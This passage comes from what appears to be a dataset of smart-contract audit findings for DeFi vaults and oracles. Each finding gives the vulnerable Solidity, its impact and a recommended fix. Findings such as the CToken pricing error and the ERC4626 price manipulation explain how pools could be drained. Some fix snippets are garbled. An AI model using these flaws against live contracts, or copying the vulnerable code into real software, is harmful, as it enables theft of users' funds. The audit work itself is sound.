Therefore, it is missing the authorize upgrade method, and the contract cannot be upgraded.\\n```\\nabstract contract BaseStrategyVault is Initializable, IStrategyVault {\\n using TokenUtils for IERC20;\\n using TradeHandler for Trade;\\n\\n /// @notice Hardcoded on the implementation contract during deployment\\n NotionalProxy public immutable NOTIONAL;\\n ITradingModule public immutable TRADING_MODULE;\\n uint8 constant internal INTERNAL_TOKEN_DECIMALS = 8;\\n \\n ..SNIP..\\n \\n // Storage gap for future potential upgrades\\n uint256[45] private __gap;\\n }\\n```\\n\\n```\\ncontract CrossCurrencyfCashVault is BaseStrategyVault {\\n using TypeConvert for uint256;\\n using TypeConvert for int256;\\n\\n uint256 public constant SETTLEMENT_SLIPPAGE_PRECISION = 1e18;\\n\\n struct DepositParams {\\n // Minimum purchase amount of the lend underlying token, this is\\n // based on the deposit + borrowed amount and must be set to a non-zero\\n // value to establish a slippage limit.\\n uint256 minPurchaseAmount;\\n // Minimum annualized lending rate, can be set to zero for no slippage limit\\n uint32 minLendRate;\\n // ID of the desired DEX to trade on, _depositFromNotional will always trade\\n // using an EXACT_IN_SINGLE trade which is supported by all DEXes\\n uint16 dexId;\\n // Exchange data depending on the selected dexId\\n ..SNIP..\\n```\\n","It is recommended to Inherit Openzepplin's `UUPSUpgradeable` contract and implement the missing authorize upgrade method.\\n```\\n// Remove the line below\\n abstract contract BaseStrategyVault is Initializable, IStrategyVault {\\n// Add the line below\\n abstract contract BaseStrategyVault is Initializable, IStrategyVault, UUPSUpgradeable {\\n using TokenUtils for IERC20;\\n using TradeHandler for Trade;\\n\\n /// @notice Hardcoded on the implementation contract during deployment\\n NotionalProxy public immutable NOTIONAL;\\n ITradingModule public immutable TRADING_MODULE;\\n uint8 constant internal INTERNAL_TOKEN_DECIMALS = 
8;\\n \\n ..SNIP..\\n \\n// Add the line below\\n function _authorizeUpgrade(\\n// Add the line below\\n address /* newImplementation */\\n// Add the line below\\n ) internal override onlyNotionalOwner {} \\n \\n // Storage gap for future potential upgrades\\n uint256[45] private __gap;\\n }\\n```\\n","If a critical bug is discovered within the Cross Currency Vault after launching that causes a loss of assets, the vault cannot be upgraded unlike the other balancer-related vaults to fix the bugs. All assets within the vault will be lost","```\\nabstract contract BaseStrategyVault is Initializable, IStrategyVault {\\n using TokenUtils for IERC20;\\n using TradeHandler for Trade;\\n\\n /// @notice Hardcoded on the implementation contract during deployment\\n NotionalProxy public immutable NOTIONAL;\\n ITradingModule public immutable TRADING_MODULE;\\n uint8 constant internal INTERNAL_TOKEN_DECIMALS = 8;\\n \\n ..SNIP..\\n \\n // Storage gap for future potential upgrades\\n uint256[45] private __gap;\\n }\\n```\\n" +"getGetAmplificationParameter() precision is not used, which result in accounting issue in MetaStable2TokenAuraHelper.sol and in Boosted3TokenAuraHelper.sol",medium,"getGetAmplificationParameter() precision is not used, which result in accounting issue in MetaStable2TokenAuraHelper.sol and in Boosted3TokenAuraHelper.sol\\nThis report has two part,\\npart one trace the accounting issue in MetaStable2TokenAuraHelper.sol,\\npart two trace the accounting issue in Boosted3TokenAuraHelper.sol,\\nboth issue rooted in not handling the getGetAmplificationParameter() precision\\nAccording to the Balancer documentation\\npool.getGetAmplificationParameter()\\nreturns something resembling\\nvalue : 620000 isUpdating : False precision : 1000\\nwhere the amplification parameter is 620000 / 1000 = 620\\nbut in the code, the isUpdating and precision returned is ignored and not used.\\nPart One\\nLet's trace the function reinvestReward in 
MetaStable2TokenAuraHelper.sol\\n```\\n function reinvestReward(\\n MetaStable2TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n )\\n```\\n\\nIt calls\\n```\\n// Make sure we are joining with the right proportion to minimize slippage\\n oracleContext._validateSpotPriceAndPairPrice({\\n poolContext: poolContext,\\n strategyContext: strategyContext,\\n primaryAmount: primaryAmount,\\n secondaryAmount: secondaryAmount\\n });\\n```\\n\\nthen it calls\\n```\\nuint256 spotPrice = _getSpotPrice(oracleContext, poolContext, 0);\\n```\\n\\nthen it calls\\nInsite the function\\n```\\n (uint256 balanceX, uint256 balanceY) = tokenIndex == 0 ?\\n (poolContext.primaryBalance, poolContext.secondaryBalance) :\\n (poolContext.secondaryBalance, poolContext.primaryBalance);\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, StableMath._balances(balanceX, balanceY), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice({\\n amplificationParameter: oracleContext.ampParam,\\n invariant: invariant,\\n balanceX: balanceX,\\n balanceY: balanceY\\n });\\n```\\n\\nWhat's wrong with this, I believe the precision has issue for ampParam\\nBecause When we get the oracleContext.ampParam from MetaStable2TokenVaultMixin.sol\\nWe did not use the precision returned from the pool\\n```\\n (\\n uint256 value,\\n /* bool isUpdating */,\\n /* uint256 precision */\\n ) = IMetaStablePool(address(BALANCER_POOL_TOKEN)).getAmplificationParameter();\\n```\\n\\nAccording to the Balancer documentation\\npool.getGetAmplificationParameter()\\nreturns something resembling\\nvalue : 620000 isUpdating : False precision : 1000\\nwhere the amplification parameter is 620000 / 1000 = 620\\nThe formula that calculate the spot price is\\n```\\n /**************************************************************************************************************\\n // //\\n // 2.a.x.y + a.y^2 + b.y //\\n // spot price Y/X = - dx/dy = 
----------------------- //\\n // 2.a.x.y + a.x^2 + b.x //\\n // //\\n // n = 2 //\\n // a = amp param * n //\\n // b = D + a.(S - D) //\\n // D = invariant //\\n // S = sum of balances but x,y = 0 since x and y are the only tokens //\\n **************************************************************************************************************/\\n```\\n\\nthe function _calcSpotPrice hardcode the amp precision to 1e3;\\n```\\n uint256 internal constant _AMP_PRECISION = 1e3;\\n```\\n\\nand implement\\n```\\nuint256 a = (amplificationParameter * 2) / _AMP_PRECISION;\\n```\\n\\nif the pool's ampParameter is not equal to _AMP_PRECISION, the math will break.\\nPart Two\\nLet's trace the call in Boosted3TokenPoolUtils.sol\\nFirst the function reinvestReward in Boosted3TokenAuraHelper.sol is called\\n```\\n function reinvestReward(\\n Boosted3TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) \\n```\\n\\nThen we call\\n```\\n uint256 minBPT = context.poolContext._getMinBPT(\\n oracleContext, strategyContext, primaryAmount\\n );\\n```\\n\\nthen we call\\n```\\n minBPT = StableMath._calcBptOutGivenExactTokensIn({\\n amp: oracleContext.ampParam,\\n balances: balances,\\n amountsIn: amountsIn,\\n bptTotalSupply: virtualSupply,\\n swapFeePercentage: 0,\\n currentInvariant: invariant\\n });\\n```\\n\\nthen we call\\n```\\n // Get current and new invariants, taking swap fees into account\\n uint256 newInvariant = _calculateInvariant(amp, newBalances, false);\\n uint256 invariantRatio = newInvariant.divDown(currentInvariant);\\n```\\n\\nthen we call\\n```\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n```\\n\\nwe just use the amplificationParameter without handling the precision.\\nThe amplificationParameter comes from BoostedTokenPoolMixin.sol\\n```\\n (\\n uint256 value,\\n /* bool isUpdating */,\\n /* uint256 precision */\\n ) = pool.getAmplificationParameter();\\n```\\n\\nthe isUpdating and precision is not 
used,\\nhowever, according to the documentation\\nAccording to the Balancer documentation\\npool.getGetAmplificationParameter()\\nreturns something resembling\\nvalue : 620000 isUpdating : False precision : 1000\\nwhere the amplification parameter is 620000 / 1000 = 620","Issue getGetAmplificationParameter() precision is not used, which result in accounting issue in MetaStable2TokenAuraHelper.sol and in Boosted3TokenAuraHelper.sol\\nWe recommend the project use the precision returned from getGetAmplificationParameter()\\n```\\n (\\n uint256 value,\\n bool isUpdating */,\\n uint256 precision */\\n ) = IMetaStablePool(address(BALANCER_POOL_TOKEN)).getAmplificationParameter();\\n return value / precision;\\n```\\n","The amplificationParameter has precision, ignoring the precision will result in accounting issue.\\nIf the precision of the amplificationParameter is not equal to hardcoded 1e3, the spot price is invalid.\\nthe code\\n```\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n```\\n\\nwill be overvalued because we did not divide the value by the precision.","```\\n function reinvestReward(\\n MetaStable2TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n )\\n```\\n" +"When one of the plugins is broken or paused, `deposit()` or `withdraw()` of the whole Vault contract can malfunction",medium,"One malfunctioning plugin can result in the whole Vault contract malfunctioning.\\nA given plugin can temporally or even permanently becomes malfunctioning (cannot deposit/withdraw) for all sorts of reasons.\\nEg, Aave V2 Lending Pool can be paused, which will prevent multiple core functions that the Aave v2 plugin depends on from working, including `lendingPool.deposit()` and `lendingPool.withdraw()`.\\n```\\n modifier whenNotPaused() {\\n _whenNotPaused();\\n _;\\n }\\n```\\n\\n```\\n function withdraw(\\n address asset,\\n uint256 amount,\\n address to\\n ) external override whenNotPaused returns (uint256) 
{\\n```\\n\\nThat's because the deposit will always goes to the first plugin, and withdraw from the last plugin first.","Issue When one of the plugins is broken or paused, `deposit()` or `withdraw()` of the whole Vault contract can malfunction\\nConsider introducing a new method to pause one plugin from the Vault contract level;\\nAave V2's Lending Pool contract has a view function `paused()`, consider returning `0` for `availableForDeposit()` and ``availableForWithdrawal() when pool paused in AaveV2Plugin:\\n```\\nfunction availableForDeposit() public view override returns (uint256) {\\n if (lendingPool.paused()) return 0;\\n return type(uint256).max - balance();\\n}\\n```\\n\\n```\\nfunction availableForWithdrawal() public view override returns (uint256) {\\n if (lendingPool.paused()) return 0;\\n return balance();\\n}\\n```\\n","When Aave V2 Lending Pool is paused, users won't be able to deposit or withdraw from the vault.\\nNeither can the owner remove the plugin nor rebalanced it to other plugins to resume operation.\\nBecause withdrawal from the plugin can not be done, and removing a plugin or rebalancing both rely on this.",```\\n modifier whenNotPaused() {\\n _whenNotPaused();\\n _;\\n }\\n```\\n +`_withdrawFromPlugin()` will revert when `_withdrawalValues[i] == 0`,medium,"When `_withdrawalValues[i] == 0` in `rebalancePlugins()`, it means NOT to rebalance this plugin.\\nHowever, the current implementation still tries to withdraw 0 from the plugin.\\nThis will revert in AaveV2Plugin as Aave V2's `validateWithdraw()` does not allow `0` withdrawals:\\n```\\n function validateWithdraw(\\n address reserveAddress,\\n uint256 amount,\\n uint256 userBalance,\\n mapping(address => DataTypes.ReserveData) storage reservesData,\\n DataTypes.UserConfigurationMap storage userConfig,\\n mapping(uint256 => address) storage reserves,\\n uint256 reservesCount,\\n address oracle\\n ) external view {\\n require(amount != 0, 
Errors.VL_INVALID_AMOUNT);\\n```\\n\\n`removePlugin()` will also always `_withdrawFromPlugin()` even if the plugin's balance is 0, as it will also tries to withdraw 0 in that case (balance is 0).","Only call `_withdrawFromPlugin()` when IPlugin(pluginAddr).balance() > 0:\\n```\\nfunction removePlugin(uint256 _index) external onlyOwner {\\n require(_index < pluginCount, ""Index out of bounds"");\\n address pluginAddr = plugins[_index];\\n if (IPlugin(pluginAddr).balance() > 0){\\n _withdrawFromPlugin(pluginAddr, IPlugin(pluginAddr).balance());\\n }\\n uint256 pointer = _index;\\n while (pointer < pluginCount - 1) {\\n plugins[pointer] = plugins[pointer + 1];\\n pointer++;\\n }\\n delete plugins[pluginCount - 1];\\n pluginCount--;\\n\\n IERC20(LINK).approve(pluginAddr, 0);\\n\\n emit PluginRemoved(pluginAddr);\\n}\\n```\\n\\n```\\nfunction rebalancePlugins(uint256[] memory _withdrawalValues) external onlyOwner {\\n require(_withdrawalValues.length == pluginCount, ""Invalid withdrawal values"");\\n for (uint256 i = 0; i < pluginCount; i++) {\\n if (_withdrawalValues[i] > 0)\\n _withdrawFromPlugin(plugins[i], _withdrawalValues[i]);\\n }\\n _distributeToPlugins();\\n}\\n```\\n","For AaveV2Plugin (and any future plugins that dont allow withdraw 0):\\nIn every rebalance call, it must at least withdraw 1 wei from the plugin for the rebalance to work.\\nThe plugin can not be removed or rebalanced when there is no balance in it.\\nIf such a plugin can not deposit for some reason (paused by gov, AaveV2Plugin may face that), this will further cause the whole system unable to be rebalanced until the deposit resumes for that plugin.","```\\n function validateWithdraw(\\n address reserveAddress,\\n uint256 amount,\\n uint256 userBalance,\\n mapping(address => DataTypes.ReserveData) storage reservesData,\\n DataTypes.UserConfigurationMap storage userConfig,\\n mapping(uint256 => address) storage reserves,\\n uint256 reservesCount,\\n address oracle\\n ) external view {\\n 
require(amount != 0, Errors.VL_INVALID_AMOUNT);\\n```\\n" +Unregulated joining fees,medium,"Observe the _deposit function\\nThis makes call to join function\\n```\\nfunction join(uint256 amount) external override joiningNotPaused {\\n uint256 fee = amount.mul(joiningFee).div(BASIS_PRECISION);\\n uint256 mintedAmount = mint(amount.sub(fee));\\n claimableFees = claimableFees.add(fee);\\n\\n // TODO: tx.origin will be deprecated in a future ethereum upgrade\\n latestJoinBlock[tx.origin] = block.number;\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n\\n emit Joined(msg.sender, amount, mintedAmount);\\n }\\n```\\n\\nAs we can see this join function deducts a fees from the deposited amount before minting. Lets see this joining fees\\nThe joining fees is introduced using setJoiningFee function\\n```\\nfunction setJoiningFee(uint256 fee) external onlyOwner {\\n require(fee <= BASIS_PRECISION, ""TrueFiPool: Fee cannot exceed transaction value"");\\n joiningFee = fee;\\n emit JoiningFeeChanged(fee);\\n }\\n```\\n\\nThis means the joiningFee will always be in between 0 to BASIS_PRECISION. 
This BASIS_PRECISION can be 100% as shown\\n```\\nuint256 private constant BASIS_PRECISION = 10000;\\n```\\n\\nThis means if joiningFee is set to BASIS_PRECISION then all user deposit will goto joining fees with user getting nothing","Issue Unregulated joining fees\\nPost calling join, check amount of shares minted for this user (use balanceOF on TrueFiPool2.sol) and if it is below minimum expected revert the transaction\\n```\\nuint256 tfUsdcBalance = tfUSDC.balanceOf(address(this));\\nrequire(tfUsdcBalance>=minSharesExpected, ""Too high fees"");\\n```\\n",Contract will lose all deposited funds,"```\\nfunction join(uint256 amount) external override joiningNotPaused {\\n uint256 fee = amount.mul(joiningFee).div(BASIS_PRECISION);\\n uint256 mintedAmount = mint(amount.sub(fee));\\n claimableFees = claimableFees.add(fee);\\n\\n // TODO: tx.origin will be deprecated in a future ethereum upgrade\\n latestJoinBlock[tx.origin] = block.number;\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n\\n emit Joined(msg.sender, amount, mintedAmount);\\n }\\n```\\n" +CTokenOracle.sol#getCErc20Price contains critical math error,high,"CTokenOracle.sol#getCErc20Price contains a math error that immensely overvalues CTokens\\nCTokenOracle.sol#L66-L76\\n```\\nfunction getCErc20Price(ICToken cToken, address underlying) internal view returns (uint) {\\n /*\\n cToken Exchange rates are scaled by 10^(18 - 8 + underlying token decimals) so to scale\\n the exchange rate to 18 decimals we must multiply it by 1e8 and then divide it by the\\n number of decimals in the underlying token. Finally to find the price of the cToken we\\n must multiply this value with the current price of the underlying token\\n */\\n return cToken.exchangeRateStored()\\n .mulDivDown(1e8 , IERC20(underlying).decimals())\\n .mulWadDown(oracle.getPrice(underlying));\\n}\\n```\\n\\nIn L74, IERC20(underlying).decimals() is not raised to the power of 10. 
This results in the price of the LP being overvalued by many orders of magnitude. A user could deposit one CToken and drain the reserves of every liquidity pool.","Issue CTokenOracle.sol#getCErc20Price contains critical math error\\nFix the math error by changing L74:\\n```\\nreturn cToken.exchangeRateStored()\\n.mulDivDown(1e8 , 10 ** IERC20(underlying).decimals())\\n.mulWadDown(oracle.getPrice(underlying));\\n \\n```\\n\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nConfirmed fix.",All lenders could be drained of all their funds due to excessive overvaluation of CTokens caused by this error,"```\\nfunction getCErc20Price(ICToken cToken, address underlying) internal view returns (uint) {\\n /*\\n cToken Exchange rates are scaled by 10^(18 - 8 + underlying token decimals) so to scale\\n the exchange rate to 18 decimals we must multiply it by 1e8 and then divide it by the\\n number of decimals in the underlying token. Finally to find the price of the cToken we\\n must multiply this value with the current price of the underlying token\\n */\\n return cToken.exchangeRateStored()\\n .mulDivDown(1e8 , IERC20(underlying).decimals())\\n .mulWadDown(oracle.getPrice(underlying));\\n}\\n```\\n" +Protocol Reserve Within A LToken Vault Can Be Lent Out,medium,"Protocol reserve, which serves as a liquidity backstop or to compensate the protocol, within a LToken vault can be lent out to the borrowers.\\nThe purpose of the protocol reserve within a LToken vault is to compensate the protocol or serve as a liquidity backstop. However, based on the current setup, it is possible for the protocol reserve within a LToken vault to be lent out.\\nThe following functions within the `LToken` contract show that the protocol reserve is intentionally preserved by removing the protocol reserve from the calculation of total assets within a `LToken` vault. 
As such, whenever the Liquidity Providers (LPs) attempt to redeem their LP token, the protocol reserves will stay intact and will not be withdrawn by the LPs.\\n```\\nfunction totalAssets() public view override returns (uint) {\\n return asset.balanceOf(address(this)) + getBorrows() - getReserves();\\n}\\n```\\n\\n```\\nfunction getBorrows() public view returns (uint) {\\n return borrows + borrows.mulWadUp(getRateFactor());\\n}\\n```\\n\\n```\\nfunction getReserves() public view returns (uint) {\\n return reserves + borrows.mulWadUp(getRateFactor())\\n .mulWadUp(reserveFactor);\\n}\\n```\\n\\nHowever, this measure is not applied consistently across the protocol. The following `lendTo` function shows that as long as the borrower has sufficient collateral to ensure their account remains healthy, the borrower could borrow as many assets from the LToken vault as they wish.\\nIn the worst-case scenario, the borrower can borrow all the assets from the LToken vault, including the protocol reserve.\\n```\\nFile: LToken.sol\\n /**\\n @notice Lends a specified amount of underlying asset to an account\\n @param account Address of account\\n @param amt Amount of token to lend\\n @return isFirstBorrow Returns if the account is borrowing the asset for\\n the first time\\n */\\n function lendTo(address account, uint amt)\\n external\\n whenNotPaused\\n accountManagerOnly\\n returns (bool isFirstBorrow)\\n {\\n updateState();\\n isFirstBorrow = (borrowsOf[account] == 0);\\n\\n uint borrowShares;\\n require((borrowShares = convertAssetToBorrowShares(amt)) != 0, ""ZERO_BORROW_SHARES"");\\n totalBorrowShares += borrowShares;\\n borrowsOf[account] += borrowShares;\\n\\n borrows += amt;\\n asset.safeTransfer(account, amt);\\n return isFirstBorrow;\\n }\\n```\\n","Issue Protocol Reserve Within A LToken Vault Can Be Lent Out\\nConsider updating the `lendTo` function to ensure that the protocol reserve is preserved and cannot be lent out. 
If the underlying asset of a LToken vault is less than or equal to the protocol reserve, the lending should be paused as it is more important to preserve the protocol reserve compared to lending them out.\\n```\\nfunction lendTo(address account, uint amt)\\n external\\n whenNotPaused\\n accountManagerOnly\\n returns (bool isFirstBorrow)\\n{\\n updateState();\\n isFirstBorrow = (borrowsOf[account] == 0);\\n \\n require\\n\\n uint borrowShares;\\n require((borrowShares = convertAssetToBorrowShares(amt)) != 0, ""ZERO_BORROW_SHARES"");\\n totalBorrowShares // Add the line below\\n= borrowShares;\\n borrowsOf[account] // Add the line below\\n= borrowShares;\\n\\n borrows // Add the line below\\n= amt;\\n asset.safeTransfer(account, amt);\\n \\n// Add the line below\\n require(asset.balanceOf(address(this)) >= getReserves(), ""Not enough liquidity for lending"") \\n \\n return isFirstBorrow;\\n}\\n```\\n\\nSentiment Team\\nWe removed reserves completely in this PR.\\nLead Senior Watson\\nConfirmed fix.","The purpose of the protocol reserve within a LToken vault is to compensate the protocol or serve as a liquidity backstop. Without the protocol reserve, the protocol will become illiquid, and there are no funds to compensate the protocol.",```\\nfunction totalAssets() public view override returns (uint) {\\n return asset.balanceOf(address(this)) + getBorrows() - getReserves();\\n}\\n```\\n +ERC4626Oracle Vulnerable To Price Manipulation,medium,"ERC4626 oracle is vulnerable to price manipulation. This allows an attacker to increase or decrease the price to carry out various attacks against the protocol.\\nThe `getPrice` function within the `ERC4626Oracle` contract is vulnerable to price manipulation because the price can be increased or decreased within a single transaction/block.\\nBased on the `getPrice` function, the price of the LP token of an ERC4626 vault is dependent on the `ERC4626.previewRedeem` and `oracleFacade.getPrice` functions. 
If the value returned by either `ERC4626.previewRedeem` or `oracleFacade.getPrice` can be manipulated within a single transaction/block, the price of the LP token of an ERC4626 vault is considered to be vulnerable to price manipulation.\\n```\\nFile: ERC4626Oracle.sol\\n    function getPrice(address token) external view returns (uint) {\\n        uint decimals = IERC4626(token).decimals();\\n        return IERC4626(token).previewRedeem(\\n            10 ** decimals\\n        ).mulDivDown(\\n            oracleFacade.getPrice(IERC4626(token).asset()),\\n            10 ** decimals\\n        );\\n    }\\n```\\n\\nIt was observed that the `ERC4626.previewRedeem` could be manipulated within a single transaction/block. As shown below, the `previewRedeem` function will call the `convertToAssets` function. Within the `convertToAssets`, the number of assets per share is calculated based on the current/spot total assets and current/spot supply that can be increased or decreased within a single block/transaction by calling the vault's deposit, mint, withdraw or redeem functions. This allows the attacker to artificially inflate or deflate the price within a single block/transaction.\\n```\\nFile: ERC4626.sol\\n    function previewRedeem(uint256 shares) public view virtual returns (uint256) {\\n        return convertToAssets(shares);\\n    }\\n```\\n\\n```\\nFile: ERC4626.sol\\n    function convertToAssets(uint256 shares) public view virtual returns (uint256) {\\n        uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n        return supply == 0 ? shares : shares.mulDivDown(totalAssets(), supply);\\n    }\\n```\\n","Avoid using the `previewRedeem` function to calculate the price of the LP token of an ERC4626 vault. 
Consider implementing TWAP so that the price cannot be inflated or deflated within a single block/transaction or within a short period of time.\\nSentiment Team\\nDepends on the integration itself, so there's no action that can be taken right now.\\nLead Senior Watson\\nAcknowledged.",The attacker could perform price manipulation to make the apparent value of an asset to be much higher or much lower than the true value of the asset. Following are some risks of price manipulation:\\nAn attacker can increase the value of their collaterals to increase their borrowing power so that they can borrow more assets than they are allowed from Sentiment.\\nAn attacker can decrease the value of some collaterals and attempt to liquidate another user account prematurely.,"```\\nFile: ERC4626Oracle.sol\\n function getPrice(address token) external view returns (uint) {\\n uint decimals = IERC4626(token).decimals();\\n return IERC4626(token).previewRedeem(\\n 10 ** decimals\\n ).mulDivDown(\\n oracleFacade.getPrice(IERC4626(token).asset()),\\n 10 ** decimals\\n );\\n }\\n```\\n" +`Reserves` should not be considered part of the available liquidity while calculating the interest rate,medium,"The implementation is different from the documentation regarding the interest rate formula.\\nThe formula given in the docs:\\nCalculates Borrow rate per second:\\n$$ Borrow Rate Per Second = c3 \\cdot (util \\cdot c1 + util^{32} \\cdot c1 + util^{64} \\cdot c2) \\div secsPerYear $$\\nwhere, $util = borrows \\div (liquidity - reserves + borrows)$\\n$$ util=borrows \\div (liquidity−reserves+borrows) $$\\n```\\n function getRateFactor() internal view returns (uint) {\\n return (block.timestamp == lastUpdated) ?\\n 0 :\\n ((block.timestamp - lastUpdated)*1e18)\\n .mulWadUp(\\n rateModel.getBorrowRatePerSecond(\\n asset.balanceOf(address(this)),\\n borrows\\n )\\n );\\n }\\n```\\n\\nHowever, the current implementation is taking all the balance as the liquidity:\\n```\\n function 
getBorrowRatePerSecond(\\n uint liquidity,\\n uint borrows\\n )\\n external\\n view\\n returns (uint)\\n {\\n uint util = _utilization(liquidity, borrows);\\n return c3.mulDivDown(\\n (\\n util.mulWadDown(c1)\\n + util.rpow(32, SCALE).mulWadDown(c1)\\n + util.rpow(64, SCALE).mulWadDown(c2)\\n ),\\n secsPerYear\\n );\\n }\\n```\\n\\n```\\n function _utilization(uint liquidity, uint borrows)\\n internal\\n pure\\n returns (uint)\\n {\\n uint totalAssets = liquidity + borrows;\\n return (totalAssets == 0) ? 0 : borrows.divWadDown(totalAssets);\\n }\\n```\\n","Issue `Reserves` should not be considered part of the available liquidity while calculating the interest rate\\nThe implementation of `getRateFactor()` can be updated to:\\n```\\nfunction getRateFactor() internal view returns (uint) {\\n return (block.timestamp == lastUpdated) ?\\n 0 :\\n ((block.timestamp - lastUpdated)*1e18)\\n .mulWadUp(\\n rateModel.getBorrowRatePerSecond(\\n asset.balanceOf(address(this)) - reserves,\\n borrows\\n )\\n );\\n}\\n```\\n\\nSentiment Team\\nRemoved reserves from LToken and added an alternate mechanism to collect direct fees.\\nLead Senior Watson\\noriginationFee may result in the borrower account becoming liquidatable immediately (aka WP-M2).\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nriskEngine.isBorrowAllowed should be removed as it's no longer needed.\\nSentiment Team\\nPushed a commit to remove the redundant call to riskEngine. 
PR here.","Per the docs, when calculating the interest rate, `util` is the ratio of the `borrows` to the total liquidity, and the available liquidity should not include reserves.\\nThe current implementation is using all the balance as the `liquidity`, this will make the interest rate lower than expected.\\nPoC\\nGiven:\\n`asset.balanceOf(address(this)) + borrows = 10000`\\n`reserves = 1500, borrows = 7000`\\nExpected result:\\nWhen calculating `getRateFactor()`, available liquidity should be `asset.balanceOf(address(this)) - reserves = 1500, util = 7000 / 8500 = 0.82`, `getBorrowRatePerSecond() = 9114134329`\\nActual result:\\nWhen calculating `getRateFactor()`, `asset.balanceOf(address(this)) = 3000, util = 0.7e18`, `getBorrowRatePerSecond() = 7763863430`\\nThe actual interest rate is only `7763863430 / 9114134329 = 85%` of the expected rate.","```\\n function getRateFactor() internal view returns (uint) {\\n return (block.timestamp == lastUpdated) ?\\n 0 :\\n ((block.timestamp - lastUpdated)*1e18)\\n .mulWadUp(\\n rateModel.getBorrowRatePerSecond(\\n asset.balanceOf(address(this)),\\n borrows\\n )\\n );\\n }\\n```\\n" +LToken's implementation is not fully up to EIP-4626's specification,medium,"Note: This issue is a part of the extra scope added by Sentiment AFTER the audit contest. This scope was only reviewed by WatchPug and relates to these three PRs:\\nLending deposit cap\\nFee accrual modification\\nCRV staking\\nLToken's implementation is not fully up to EIP-4626's specification. This issue would actually be considered a Low issue if it were a part of a Sherlock contest.\\n```\\nfunction maxMint(address) public view virtual returns (uint256) {\\n return type(uint256).max;\\n}\\n```\\n\\nMUST return the maximum amount of shares mint would allow to be deposited to receiver and not cause a revert, which MUST NOT be higher than the actual maximum that would be accepted (it should underestimate if necessary). This assumes that the user has infinite assets, i.e. 
MUST NOT rely on balanceOf of asset.\\nmaxMint() and maxDeposit() should reflect the limitation of maxSupply.",maxMint() and maxDeposit() should reflect the limitation of maxSupply.\\nConsider changing maxMint() and maxDeposit() to:\\n```\\nfunction maxMint(address) public view virtual returns (uint256) {\\n if (totalSupply >= maxSupply) {\\n return 0;\\n }\\n return maxSupply - totalSupply;\\n}\\n```\\n\\n```\\nfunction maxDeposit(address) public view virtual returns (uint256) {\\n return convertToAssets(maxMint(address(0)));\\n}\\n```\\n\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nConfirmed fix.,Could cause unexpected behavior in the future due to non-compliance with EIP-4626 standard.,```\\nfunction maxMint(address) public view virtual returns (uint256) {\\n return type(uint256).max;\\n}\\n```\\n +`UniV2LPOracle` will malfunction if token0 or token1's `decimals != 18`,high,"When one of the LP token's underlying tokens `decimals` is not 18, the price of the LP token calculated by `UniV2LPOracle` will be wrong.\\n`UniV2LPOracle` is an implementation of Alpha Homora v2's Fair Uniswap's LP Token Pricing Formula:\\nThe Formula ... 
of combining fair asset prices and fair asset reserves:\\n$$ P = 2\\cdot \\frac{\\sqrt{r_0 \\cdot r_1} \\cdot \\sqrt{p_0\\cdot p_1}}{totalSupply}, $$\\nwhere $r_i$ is the asset $i$'s pool balance and $p_i$ is the asset $i$'s fair price.\\nHowever, the current implementation wrongfully assumes $r_0$ and $r_1$ are always in 18 decimals.\\n```\\nfunction getPrice(address pair) external view returns (uint) {\\n (uint r0, uint r1,) = IUniswapV2Pair(pair).getReserves();\\n\\n // 2 * sqrt(r0 * r1 * p0 * p1) / totalSupply\\n return FixedPointMathLib.sqrt(\\n r0\\n .mulWadDown(r1)\\n .mulWadDown(oracle.getPrice(IUniswapV2Pair(pair).token0()))\\n .mulWadDown(oracle.getPrice(IUniswapV2Pair(pair).token1()))\\n )\\n .mulDivDown(2e27, IUniswapV2Pair(pair).totalSupply());\\n}\\n```\\n\\n```\\nuint256 internal constant WAD = 1e18; // The scalar of ETH and most ERC20s.\\n\\nfunction mulWadDown(uint256 x, uint256 y) internal pure returns (uint256) {\\n return mulDivDown(x, y, WAD); // Equivalent to (x * y) / WAD rounded down.\\n}\\n```\\n\\n```\\nfunction mulDivDown(\\n uint256 x,\\n uint256 y,\\n uint256 denominator\\n) internal pure returns (uint256 z) {\\n assembly {\\n // Store x * y in z for now.\\n z := mul(x, y)\\n\\n // Equivalent to require(denominator != 0 && (x == 0 || (x * y) / x == y))\\n if iszero(and(iszero(iszero(denominator)), or(iszero(x), eq(div(z, x), y)))) {\\n revert(0, 0)\\n }\\n\\n // Divide z by the denominator.\\n z := div(z, denominator)\\n }\\n}\\n```\\n",Issue `UniV2LPOracle` will malfunction if token0 or token1's `decimals != 18`\\nConsider normalizing r0 and r1 to 18 decimals before using them in the formula.\\nSentiment Team\\nFixed as recommended. 
PRs here and here.\\nLead Senior Watson\\nConfirmed fix.,"When the decimals of one or both tokens in the pair are not 18, the price will be way off.","```\\nfunction getPrice(address pair) external view returns (uint) {\\n (uint r0, uint r1,) = IUniswapV2Pair(pair).getReserves();\\n\\n // 2 * sqrt(r0 * r1 * p0 * p1) / totalSupply\\n return FixedPointMathLib.sqrt(\\n r0\\n .mulWadDown(r1)\\n .mulWadDown(oracle.getPrice(IUniswapV2Pair(pair).token0()))\\n .mulWadDown(oracle.getPrice(IUniswapV2Pair(pair).token1()))\\n )\\n .mulDivDown(2e27, IUniswapV2Pair(pair).totalSupply());\\n}\\n```\\n" +Tokens received from Curve's `remove_liquidity()` should be added to the assets list even if `_min_amounts` are set to `0`,high,"Curve controller's `canRemoveLiquidity()` should return all the underlying tokens as `tokensIn` rather than only the tokens with `minAmount > 0`.\\n```\\nfunction canRemoveLiquidity(address target, bytes calldata data)\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n (,uint256[2] memory amounts) = abi.decode(\\n data[4:],\\n (uint256, uint256[2])\\n );\\n\\n address[] memory tokensOut = new address[](1);\\n tokensOut[0] = target;\\n\\n uint i; uint j;\\n address[] memory tokensIn = new address[](2);\\n while(i < 2) {\\n 